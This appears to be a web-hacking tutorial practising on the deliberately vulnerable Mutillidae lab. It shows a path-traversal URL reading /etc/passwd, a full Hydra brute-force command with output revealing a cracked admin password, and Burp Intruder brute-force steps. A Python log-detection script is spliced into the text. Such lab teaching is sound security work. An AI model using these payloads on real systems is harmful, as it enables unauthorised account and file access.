Okay, now we learn about privilege escalation. What is privilege escalation?
Privilege escalation is the act of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user. There are two kinds of privilege escalation: vertical and horizontal.
- Vertical privilege escalation requires the attacker to grant himself higher privileges. This is typically achieved by performing kernel-level operations that allow the attacker to run unauthorized code.
- Horizontal privilege escalation requires the attacker to use the same level of privileges he already has been granted, but assume the identity of another user with similar privileges. For example, someone gaining access to another person's online banking account would constitute horizontal privilege escalation.
What is LFI? A local file inclusion (usually called "LFI") is a web hacking technique that simply allows files to be included from a local location. That means we can include a file that is outside the web directory (if we have the rights) and execute PHP code.
LFI (Local File Inclusion)
- Open Mutillidae in a browser; you will see the URL below:
http://localhost/mutillidae/index.php?page=home.php
- The "?page=home.php" part of the URI above indicates that this application tries to read a file on the local server. We can try to read another file on the system, for example /etc/passwd:
http://localhost/mutillidae/index.php?page=../../../../../../etc/passwd
- Wow, can you see that
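A detection check for the request shown above, as an added example (not part of the original post or of Mutillidae): it scans web-server access log lines for "page" values that resolve outside the web root, including URL-encoded traversal. The log lines are constructed, and WEB_ROOT and the function names are assumptions.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

WEB_ROOT = "/var/www/mutillidae"  # assumed include directory, not taken from the post
REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<url>\S+) HTTP/[\d.]+"')

# Constructed access-log lines (combined log format), for illustration only.
SAMPLE_LOG = [
    '127.0.0.1 - - [15/Sep/2012:12:40:01 +0700] "GET /mutillidae/index.php?page=home.php HTTP/1.1" 200 5120',
    '127.0.0.1 - - [15/Sep/2012:12:41:10 +0700] "GET /mutillidae/index.php?page=../../../../../../etc/passwd HTTP/1.1" 200 1830',
    '10.0.0.7 - - [15/Sep/2012:12:42:33 +0700] "GET /mutillidae/index.php?page=%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1830',
    '10.0.0.7 - - [15/Sep/2012:12:43:02 +0700] "GET /mutillidae/index.php?page=login.php HTTP/1.1" 200 4000',
]

def fully_decode(value, max_rounds=5):
    """Undo repeated URL-encoding (%252e -> %2e -> .) so encoded traversal is visible."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def resolve_page(page, web_root=WEB_ROOT):
    """Return the path an include of `page` relative to web_root would reach."""
    # Normalise backslashes and cut at a NUL byte (old PHP truncated paths there).
    page = fully_decode(page).replace("\\", "/").split("\x00")[0]
    return posixpath.normpath(posixpath.join(web_root, page))

def escapes_root(resolved, web_root=WEB_ROOT):
    """True when the resolved path is not inside web_root."""
    return resolved != web_root and not resolved.startswith(web_root + "/")

def traversal_hits(log_lines, web_root=WEB_ROOT):
    """Return (client_ip, resolved_path) for each request whose page leaves web_root."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = urlsplit(match.group("url")).query
        for page in parse_qs(query).get("page", []):  # parse_qs decodes one layer
            resolved = resolve_page(page, web_root)
            if escapes_root(resolved, web_root):
                hits.append((line.split()[0], resolved))
    return hits

if __name__ == "__main__":
    for ip, path in traversal_hits(SAMPLE_LOG):
        print(f"{ip} requested a page resolving to {path}")
```

The same resolve-then-compare check, applied inside the application before the include, is what stops the request instead of only logging it.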
Brute Force
- Run Hydra with this command:
Usage
hydra -> the program name
-l -> the username
-P -> the wordlist
127.0.0.1 -> your target host; it can be changed to a domain name
http-post-form -> the service module
"/mutillidae/index.php?page=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:Not Logged In"
/mutillidae/index.php?page=login.php -> the application path
username -> input form field
password -> input form field
login-php-submit-button -> the form's submit button field
Not Logged In -> the message shown when the application fails to log in
Run this command:
hydra -l admin -P pass.txt 127.0.0.1 http-post-form "/mutillidae/index.php?page=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:Not Logged In"
- OK, the password is found:
Hydra v7.1 (c)2011 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2012-09-15 12:51:15
[DATA] 8 tasks, 1 server, 8 login tries (l:1/p:8), ~1 try per task
[DATA] attacking service http-post-form on port 80
[80][www-form] host: 127.0.0.1 login: admin password: adminpass
[STATUS] attack finished for 127.0.0.1 (waiting for children to finish)
1 of 1 target successfuly completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2012-09-15 12:51:16
- We need to configure the network settings of our browser; in this case I am assuming Firefox.
- Click Edit->Preferences->Select Advanced Tab->Select Network->Settings.
Host : 127.0.0.1
Port : 8080
- Open Burp Suite: Start menu->Backtrack->Vulnerability Assessment->Web Vulnerability Assessment->Web Application Proxies->Burp Suite
- Go to Proxy tab->Intercept tab and make sure that "intercept" is on
- Go back into Firefox, open login page of Mutillidae
- You will see the Burp Suite blinking at the taskbar
- Go to Burp Suite window
- Click forward button
- Go to the Mutillidae login page and fill in a random username and password (test only); for example, I'm using user:pass. Then click login. You will see Burp Suite blinking. Go back to the Burp Suite window.
- Right-click in the raw column and select "send to intruder"
- Go to the Intruder tab,
Select some text and click clear
Select "Cluster Bomb" for attack type
- Still on Intruder tab, select Payload tab
Select "1" at payload type, and add a username (you can add more than one username)
Select "2" at payload set, and add a list of random passwords
- Go to the Burp Suite menu, select Intruder->Start Attack, and wait for the brute force to finish.
If the username and password are cracked, you will see a result that looks like this...
http://localhost/mutillidae/index.php?page=login.php